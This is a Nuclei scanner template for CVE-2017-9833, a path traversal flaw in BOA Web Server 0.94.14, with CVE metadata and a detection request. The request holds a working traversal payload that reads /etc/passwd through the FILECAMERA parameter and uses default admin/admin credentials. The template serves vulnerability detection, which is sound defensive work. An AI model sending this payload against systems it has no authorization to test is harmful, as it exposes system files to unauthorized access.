nuclei-templates/cves/2017/CVE-2017-9833.yaml

36 lines
1.1 KiB
YAML

id: CVE-2017-9833
info:
name: BOA Web Server 0.94.14 - Arbitrary File Access
author: 0x_Akoko
severity: high
description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.
reference:
- https://www.exploit-db.com/exploits/42290
- https://www.cvedetails.com/cve/CVE-2017-9833
- https://pastebin.com/raw/rt7LJvyF
- https://www.exploit-db.com/exploits/42290/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-9833
cwe-id: CWE-22
tags: boa,lfr,lfi,cve,cve2017,edb
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/04/12